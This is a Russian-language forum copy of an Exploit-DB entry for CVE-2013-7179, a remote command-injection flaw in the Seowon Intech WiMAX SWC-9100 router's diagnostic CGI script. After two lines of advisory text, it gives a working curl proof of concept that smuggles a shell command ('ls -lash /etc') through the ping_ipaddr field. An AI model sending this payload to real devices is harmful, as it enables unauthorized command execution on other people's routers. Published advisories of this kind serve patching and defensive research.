- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39074
- Проверка EDB
-
- Пройдено
- Автор
- JOSUE ROJAS
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2013-7179
- Дата публикации
- 2014-02-03
Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution
Код:
source: https://www.securityfocus.com/bid/65306/info
WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls
-lash /etc%23&ping_count=1&action=Apply&html_view=ping"
"http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null- Источник
- www.exploit-db.com
